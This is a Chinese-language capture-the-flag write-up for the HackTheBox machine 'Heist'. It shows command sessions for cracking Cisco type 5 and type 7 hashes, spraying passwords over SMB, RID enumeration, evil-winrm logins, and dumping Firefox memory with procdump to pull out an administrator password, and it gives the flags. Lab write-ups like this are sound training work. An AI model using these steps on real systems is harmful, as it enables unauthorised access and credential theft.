Skip to content

Heist Writeup

靶機資訊

Machine Description
Name Heist
OS Windows
Difficulty Easy
Author MinatoTW

情蒐 Recon

服務掃描

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-methods:
|_  Potentially risky methods: TRACE
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-12-23T08:56:19
|_  start_date: N/A
|_clock-skew: -1s
Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ sudo nmap -p- -Pn --min-rate 6969 10.129.96.157
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 03:32 EST
Nmap scan report for 10.129.96.157
Host is up (0.056s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 19.00 seconds

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ sudo nmap -p80,135,445,5985,49669 -sCV -Pn 10.129.96.157
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 03:55 EST
Nmap scan report for 10.129.96.157
Host is up (0.056s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-methods:
|_  Potentially risky methods: TRACE
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-12-23T08:56:19
|_  start_date: N/A
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.31 seconds

掃完標的發現開啟五個port,分別是HTTP、SMB、WinRM(5985)和不重要,從掃描結果得知HTTP伺服器是IIS 10.0,所以依此推測系統是Windows 10(或是2k16),往下看得知cookie是PHPSESSID,因此後端是PHP。

HTTP - Port 80

由於不知道網站網址,所以IP直連看看。

伺服器跳轉至/login.php,由於沒有創建帳號的方式,先使用左下角「Login as guest」,以訪客登入。

得知使用者Hazard沒辦法正確設定Cisco路由器,向Support尋求協助,並附上 設定檔(在Attachment)

本階段其餘完成事項
  1. Web黑箱,沒有找到弱點,而且後端根本沒有DB。
  2. 由於不知道標的的域名,只能先猜測帳號是:[email protected],並嘗試爆破,失敗。

暴力破解Cisco密碼

那當然是看看設定檔裡寫了什麼!

結果裡面寫了帳號和密碼Hash。

ecurity passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

看到這裡,如果沒有接觸過Cisco的網通設備,可能會有點難繼續打下去,但是應該至少可以猜到要爆破Hash,畢竟$1$...很明顯是MD5 Hash。

解釋一下設定檔?

裡面使用了兩種加密方法,分別是Type 5,使用 MD5 加密(secret 5), 和Type 7,使用 Vigenere cipher 加密(password 7),兩個加密方法都有弱點,MD5可以暴力破解,Vigenere cipher是XOR加密法也可以破解。

欲知其他Cisco的Type,請參考KB

至於我在怎麼知道這種Cisco的密碼可以破解? 那是因為很久以前的工作,需要接手前人的爛攤子,帳號密碼都沒有交接,啊不就好險設備很舊,可以破解QQ

直接上網搜Hash就可以得到第一個密碼。

至於另外兩個Type 7,可以使用GitHub上的破解腳本,或是懶得話可以類似這樣的網站還原密碼。

建議使用腳本比較好,永遠不知道網站會不會偷密碼。

$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent
0242114B0E143F015F5D1E161713:$uperP@ssword
02375012182C1A1D751618034F36415408:Q4)sJu\Y8qz*A3?d

密碼潑灑 Part 1

使用蒐集到的帳號密碼,亂try一通。

Hazard
hazard
admin
Admin
Administrator
administrator
rout3r
support
support_admin
stealth1agent
$uperP@ssword
Q4)sJu\Y8qz*A3?d

WinRM試完沒有,但是SMB就中了!

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u user.txt -p pass.txt

SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agen

取得Hazard的密碼!

SupportDesk\Hazard:stealth1agen

內部情蒐 Part 1

SMB目錄詳列

沒戲,沒有東西可以讀。

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u Hazard -p stealth1agent --shares
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent
SMB         10.129.96.157   445    SUPPORTDESK      [*] Enumerated shares
SMB         10.129.96.157   445    SUPPORTDESK      Share           Permissions     Remark
SMB         10.129.96.157   445    SUPPORTDESK      -----           -----------     ------
SMB         10.129.96.157   445    SUPPORTDESK      ADMIN$                          Remote Admin
SMB         10.129.96.157   445    SUPPORTDESK      C$                              Default share
SMB         10.129.96.157   445    SUPPORTDESK      IPC$            READ            Remote IPC

RID枚舉使用者

經過許多嘗試,最後發現使用rid才能成功爆出使用者。

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u Hazard -p stealth1agent --rid-brute
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent
SMB         10.129.96.157   445    SUPPORTDESK      500: SUPPORTDESK\Administrator (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      501: SUPPORTDESK\Guest (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      513: SUPPORTDESK\None (SidTypeGroup)
SMB         10.129.96.157   445    SUPPORTDESK      1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1009: SUPPORTDESK\support (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1012: SUPPORTDESK\Chase (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1013: SUPPORTDESK\Jason (SidTypeUser)

找到新帳號了!蒐集成新的使用者成清單。

Administrator
support
Chase
Jason
None
Guest
DefaultAccount
WDAGUtilityAccount

密碼潑灑 Part 2

再亂try一次。

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u user2.txt -p pass.txt --continue-on-success
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\None:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Guest:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\DefaultAccount:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\None:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Guest:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\DefaultAccount:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] Connection Error: Error occurs while reading from remote(104)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\DefaultAccount:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE

噫!好!我中了!取得Chase的密碼。

SupportDesk\Hazard:stealth1agen
SupportDesk\Chase:Q4)sJu\Y8qz*A3?d

WinRM登入Chase

由於Hazard

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ evil-winrm -i 10.129.96.157 -u Chase -p "Q4)sJu\Y8qz*A3?d"

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> type ..\Desktop\user.txt
0e6d4756a8bd6019369427c72e67a0b7

內部情蒐 Part 2

搜尋看看有沒有其他有趣的檔案。

Terminal
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir


    Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---       12/23/2024   1:59 PM             34 user.txt


*Evil-WinRM* PS C:\Users\Chase\Desktop> type tod*
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

閱讀桌面下的todo.txt檔,得知管理員會定期查看issues,也就是稍早取得Cisco設定檔的頁面。

網站原始碼

cdC:\\inetpub\下,發現沒有詳列目錄的權限(不能dir),但是可以直接讀取檔案(猜),像是login.php

*Evil-WinRM* PS C:\inetpub\wwwroot> type lo*
<!DOCTYPE html>
<html lang="en" >
...
<?php
session_start();
if( isset($_REQUEST['login']) && !empty($_REQUEST['login_username']) && !empty($_REQUEST['login_password'])) {
        if( $_REQUEST['login_username'] === '[email protected]' && hash( 'sha256', $_REQUEST['login_password']) === '91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040') {
                $_SESSION['admin'] = "valid";
                header('Location: issues.php');
        }
        else
                header('Location: errorpage.php');
}
else if( isset($_GET['guest']) ) {
        if( $_GET['guest'] === 'true' ) {
                $_SESSION['guest'] = "valid";
                header('Location: issues.php');
        }
}
?>
</html>

取得admin的密碼的sha256 hash,不想爆破,因為多半沒用,如果沒有其他路,再回來破也不遲。

程序詳列

最後在C:\\Program File\下面發現這台機器裝了Firefox,想說該不會管理者就是用這台機器看issues?於是詳列看看目前執行的程式。

Terminal
*Evil-WinRM* PS C:\Users\Chase\Documents> Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

ProcessName           Id
-----------           --
csrss                360
csrss                476
ctfmon              2120
dllhost             3852
dllhost             6772
dwm                  952
explorer             948
firefox             4364
firefox             6460
firefox             6568
firefox             6704
firefox             6980
...

結果真的有。

盜取Firefox的記憶體

Dump記憶體的方式百百種,在此使用微軟的Procdump1,取得最新的Firefox程序記憶體內容。

Terminal
*Evil-WinRM* PS C:\Users\Chase\Documents> upload /home/kali/Documents/tools/procdump.exe

Info: Uploading /home/kali/Documents/tools/procdump.exe to C:\Users\Chase\Documents\procdump.exe

Data: 1055944 bytes of 1055944 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase\Documents> ./procdump.exe -accepteula
...
*Evil-WinRM* PS C:\Users\Chase\Documents> ./procdump.exe -ma 6980

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[16:47:30] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_241223_164730.dmp
[16:47:31] Dump 1 writing: Estimated dump file size is 307 MB.
[16:47:32] Dump 1 complete: 308 MB written in 1.4 seconds
[16:47:32] Dump count reached.

過濾記憶體內容

Firefox的記憶體中,儲存了使用者瀏覽的歷史紀錄,可能包含敏感資訊。於是依據剛才檢視login.php原始碼,得知密碼以login_password=<PASSWORD>送出,並以此過濾記憶體。

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ rg -ao 'login_password=([^&]+)' firefox.exe_241223_164730.dmp
2696:login_password=4dD!5}x/re8]FBuZ
2896:login_password=4dD!5}x/re8]FBuZ
2896:login_password=4dD!5}x/re8]FBuZ

成功取得管理員密碼。

登入Administrator

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ evil-winrm -i 10.129.96.157 -u Administrator -p "4dD\!5}x/re8]FBuZ"

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Des*/*.txt
e3254f34e1f191af2cefaf1f4a8b6224

  1. 微軟簽名過的原生工具,可以取得程序記憶體內容。 Sysinternals - ProcDump, Microsoft 


Last update: 2024-12-24 Created: 2024-12-24